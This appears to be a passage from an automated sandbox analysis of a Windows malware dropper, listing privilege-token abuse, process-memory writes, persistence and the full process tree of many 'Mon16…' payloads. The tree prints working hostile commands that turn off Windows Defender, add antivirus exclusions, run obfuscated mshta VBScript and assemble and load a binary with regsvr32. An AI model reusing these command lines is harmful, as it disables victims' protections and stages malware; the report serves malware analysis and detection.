N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2932 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2860 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1661118952.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe

Mon166dc6040fb8726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

Mon16734014a69dec.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon164c5af508c3.exe

Mon164c5af508c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16ac385cfd.exe

Mon16ac385cfd.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon161bd381a14aea5c.exe

Mon161bd381a14aea5c.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1618e4439d986270.exe

Mon1618e4439d986270.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe

Mon1661118952.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe

Mon16b7581baf7.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe

Mon167f9db638e4.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1631358b82299bd8.exe

Mon1631358b82299bd8.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe

Mon16bd4a93b822a.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe

Mon16737798ac26f984.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe

Mon16e127a54386dd68.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe

Mon16957e622fa390.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF """" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp" /SL5="$50232,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16957e622fa390.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe" -u

C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp

"C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp" /SL5="$501F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VI925.tmp\Mon16737798ac26f984.tmp" /SL5="$601F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "" == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe" ) do taskkill -IM "%~nXc" -F

C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE

WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG

C:\Windows\SysWOW64\taskkill.exe

taskkill -IM "Mon1661118952.exe" -F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBscRIPt: cLoSe ( creaTEoBjecT ( "WsCrIPt.ShELl" ). run ( "C:\Windows\system32\cmd.exe /R tYpe ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE""> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF ""/PBIzjiz3UWH4ATMXBTQCoG "" == """" for %c In ( ""C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"" ) do taskkill -IM ""%~nXc"" -F " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R tYpe "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE"> WIBCK.eXE && StarT WIbCK.eXE /PBIzjiz3UWH4ATMXBTQCoG & IF "/PBIzjiz3UWH4ATMXBTQCoG " == "" for %c In ( "C:\Users\Admin\AppData\Local\Temp\WIBCK.eXE" ) do taskkill -IM "%~nXc" -F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIPt:cLoSe ( creaTEOBJEcT ( "wsCRipt.SheLL" ). RUN( "C:\Windows\system32\cmd.exe /q /c ECho | set /P = ""MZ"" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W " , 0 , TrUe ) )

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16734014a69dec.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /c ECho | set /P = "MZ" > NWHPW.hX5& CoPy /Y /b NWHPW.HX5 + TFQUjJ.N + USE8pS.0rL + PeLOUZb0.jKJ + N6O00.K + B6Oj.Xh + K30Q.Qo AGKPq.W & sTarT regsvr32 -s aGKpQ.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECho "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>NWHPW.hX5"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 -s aGKpQ.W

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241106104111.log C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\conhost.exe

